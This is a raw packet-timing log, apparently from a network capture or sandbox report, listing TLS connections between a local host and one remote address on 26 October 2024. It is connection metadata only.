                                                                              Oct 26, 2024 08:49:27.766336918 CEST4434978613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.768136978 CEST4434978713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.768438101 CEST49787443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.768513918 CEST4434978713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.768785954 CEST49787443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.768800020 CEST4434978713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.852396011 CEST4434978413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.852464914 CEST4434978413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.852533102 CEST49784443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.852677107 CEST49784443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.852694035 CEST4434978413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.852701902 CEST49784443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.852708101 CEST4434978413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.855453014 CEST49788443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.855483055 CEST4434978813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.855540991 CEST49788443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.855700970 CEST49788443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.855710030 CEST4434978813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.858557940 CEST4434978513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.858606100 CEST4434978513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.858671904 CEST49785443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.858824968 CEST49785443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.858825922 CEST49785443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.858864069 CEST4434978513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.858889103 CEST4434978513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.861156940 CEST49789443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.861254930 CEST4434978913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.861434937 CEST49789443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.861650944 CEST49789443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.861670971 CEST4434978913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.870198011 CEST4434978313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.870347977 CEST4434978313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.870394945 CEST49783443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.870419025 CEST49783443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.870430946 CEST4434978313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.870441914 CEST49783443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.870446920 CEST4434978313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.872469902 CEST49790443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.872482061 CEST4434979013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.872536898 CEST49790443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.872730017 CEST49790443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.872740030 CEST4434979013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.901233912 CEST4434978613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.942743063 CEST49786443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.942759991 CEST4434978613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.942900896 CEST49786443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.942909956 CEST4434978613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.942929029 CEST49786443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.943114042 CEST4434978613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.943144083 CEST4434978613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.943248034 CEST49786443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.943795919 CEST4434978713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.944190025 CEST4434978713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.944263935 CEST49787443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.944389105 CEST49787443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.944389105 CEST49787443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.944417953 CEST4434978713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.944442034 CEST4434978713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.945996046 CEST49791443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.946031094 CEST4434979113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.946284056 CEST49791443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.946407080 CEST49791443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.946419001 CEST4434979113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.946436882 CEST49792443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.946460962 CEST4434979213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:27.946543932 CEST49792443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.946751118 CEST49792443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:27.946758986 CEST4434979213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.588901997 CEST4434978813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.589493036 CEST49788443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.589524984 CEST4434978813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.590064049 CEST49788443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.590069056 CEST4434978813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.591829062 CEST4434978913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.592206001 CEST49789443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.592257023 CEST4434978913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.592556953 CEST49789443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.592565060 CEST4434978913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.608345032 CEST4434979013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.608688116 CEST49790443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.608709097 CEST4434979013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.609074116 CEST49790443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.609077930 CEST4434979013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.690737963 CEST4434979213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.691550016 CEST49792443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.691570044 CEST4434979213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.692693949 CEST49792443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.692698002 CEST4434979213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.704360008 CEST4434979113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.704895973 CEST49791443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.704950094 CEST4434979113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.705197096 CEST49791443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.705214024 CEST4434979113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.719197989 CEST4434978813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.719259977 CEST4434978813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.719337940 CEST49788443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.719497919 CEST49788443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.719512939 CEST4434978813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.719523907 CEST49788443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.719530106 CEST4434978813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.724041939 CEST49793443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.724080086 CEST4434979313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.724147081 CEST49793443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.724647999 CEST49793443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.724664927 CEST4434979313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.725151062 CEST4434978913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.725419044 CEST4434978913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.725614071 CEST49789443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.725614071 CEST49789443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.725614071 CEST49789443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.735858917 CEST49794443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.735899925 CEST4434979413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.736049891 CEST49794443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.736196041 CEST49794443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.736207962 CEST4434979413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.736231089 CEST4434979013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.736362934 CEST4434979013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.736418962 CEST49790443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.736438990 CEST49790443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.736449957 CEST4434979013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.736458063 CEST49790443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.736462116 CEST4434979013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.738393068 CEST49795443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.738409996 CEST4434979513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.738518000 CEST49795443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.738738060 CEST49795443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.738754988 CEST4434979513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.827058077 CEST4434979213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.827142000 CEST4434979213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.827308893 CEST49792443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.836689949 CEST4434979113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.836909056 CEST4434979113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.837146997 CEST49791443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.845470905 CEST49792443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.845491886 CEST4434979213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.845504045 CEST49792443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.845510960 CEST4434979213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.847146034 CEST49791443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.847194910 CEST4434979113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.847229004 CEST49791443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.847245932 CEST4434979113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.859070063 CEST49796443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.859081984 CEST4434979613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.859338999 CEST49796443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.861356974 CEST49797443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.861404896 CEST4434979713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.861665964 CEST49797443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.862613916 CEST49796443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.862622976 CEST4434979613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:28.864392996 CEST49797443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:28.864438057 CEST4434979713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.038494110 CEST49789443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.038542986 CEST4434978913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.461781979 CEST4434979413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.462251902 CEST49794443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.462301970 CEST4434979413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.462703943 CEST49794443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.462708950 CEST4434979413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.470033884 CEST4434979513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.470819950 CEST49795443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.470891953 CEST4434979513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.471514940 CEST49795443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.471530914 CEST4434979513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.471987009 CEST4434979313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.472307920 CEST49793443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.472326994 CEST4434979313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.475384951 CEST49793443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.475392103 CEST4434979313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.590753078 CEST4434979413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.590904951 CEST4434979413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.591089010 CEST49794443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.591408968 CEST49794443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.591430902 CEST4434979413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.591440916 CEST49794443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.591448069 CEST4434979413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.592551947 CEST4434979613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.593611956 CEST49796443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.593632936 CEST4434979613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.594073057 CEST4434979713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.594610929 CEST49796443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.594616890 CEST4434979613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.595689058 CEST4434979513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.595865965 CEST4434979513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.595882893 CEST49797443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.595922947 CEST49795443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.595925093 CEST4434979713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.596689939 CEST49797443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.596702099 CEST4434979713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.596937895 CEST49795443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.596955061 CEST4434979513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.596985102 CEST49795443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.596992970 CEST4434979513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.604798079 CEST4434979313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.605084896 CEST4434979313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.605161905 CEST49793443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.605542898 CEST49793443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.605549097 CEST4434979313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.605562925 CEST49793443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.605567932 CEST4434979313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.607486963 CEST49799443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.607563019 CEST4434979913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.607630968 CEST49799443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.608517885 CEST49799443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.608553886 CEST4434979913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.610960960 CEST49800443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.610994101 CEST4434980013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.611058950 CEST49800443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.612226963 CEST49801443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.612252951 CEST4434980113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.612422943 CEST49801443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.612572908 CEST49801443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.612586021 CEST4434980113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.612633944 CEST49800443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.612649918 CEST4434980013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.725488901 CEST4434979713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.725558996 CEST4434979713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.725776911 CEST49797443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.725862980 CEST49797443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.725862980 CEST49797443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.725908995 CEST4434979713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.725946903 CEST4434979713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.728468895 CEST49802443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.728499889 CEST4434980213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.728559971 CEST49802443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.728730917 CEST49802443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.728739977 CEST4434980213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.728976965 CEST4434979613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.729123116 CEST4434979613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.729177952 CEST49796443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.729228020 CEST49796443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.729228020 CEST49796443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.729250908 CEST4434979613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.729264021 CEST4434979613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.731300116 CEST49803443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.731332064 CEST4434980313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:29.731499910 CEST49803443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.731717110 CEST49803443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:29.731730938 CEST4434980313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.338850975 CEST4434979913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.340199947 CEST49799443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.340280056 CEST4434979913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.341763973 CEST49799443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.341778994 CEST4434979913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.342139959 CEST4434980113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.342638016 CEST49801443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.342669964 CEST4434980113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.343364954 CEST49801443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.343374014 CEST4434980113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.363523006 CEST4434980013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.367211103 CEST49800443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.367240906 CEST4434980013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.368107080 CEST49800443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.368113041 CEST4434980013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.462568045 CEST4434980213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.463666916 CEST49802443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.463685036 CEST4434980213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.464740992 CEST49802443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.464745998 CEST4434980213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.468084097 CEST4434979913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.468358994 CEST4434979913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.468425989 CEST49799443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.468523979 CEST49799443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.468569040 CEST4434979913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.468585968 CEST49799443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.468601942 CEST4434979913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.471359015 CEST4434980313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.471950054 CEST4434980113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.472151041 CEST4434980113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.472234011 CEST49801443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.474730968 CEST49803443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.474746943 CEST4434980313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.475462914 CEST49803443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.475467920 CEST4434980313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.475694895 CEST49801443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.475714922 CEST4434980113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.475727081 CEST49801443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.475730896 CEST4434980113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.481338024 CEST49804443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.481383085 CEST4434980413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.481501102 CEST49804443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.482405901 CEST49805443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.482439995 CEST4434980513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.482598066 CEST49805443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.482675076 CEST49804443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.482686043 CEST4434980413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.482881069 CEST49805443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.482898951 CEST4434980513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.497503996 CEST4434980013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.497627020 CEST4434980013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.497994900 CEST49800443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.498079062 CEST49800443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.498079062 CEST49800443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.498100042 CEST4434980013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.498111010 CEST4434980013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.592217922 CEST4434980213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.592286110 CEST4434980213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.592582941 CEST49802443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.612919092 CEST4434980313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.613398075 CEST4434980313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.613646984 CEST49803443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.642767906 CEST49802443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.642767906 CEST49802443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.642797947 CEST4434980213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.642811060 CEST4434980213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.647847891 CEST49803443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.647847891 CEST49803443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.647864103 CEST4434980313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.647875071 CEST4434980313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.650574923 CEST49806443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.650629044 CEST4434980613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.650697947 CEST49806443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.651463985 CEST49806443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.651473045 CEST4434980613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.653789997 CEST49807443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.653841019 CEST4434980713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.653939009 CEST49807443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.654274940 CEST49807443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.654292107 CEST4434980713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.655745029 CEST49808443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.655759096 CEST4434980813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:30.655945063 CEST49808443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.656235933 CEST49808443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:30.656250954 CEST4434980813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:31.209840059 CEST4434980513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:31.212883949 CEST4434980413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:31.217103958 CEST49805443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:31.217133045 CEST4434980513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:31.218139887 CEST49805443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:31.218144894 CEST4434980513.107.246.45192.168.2.4
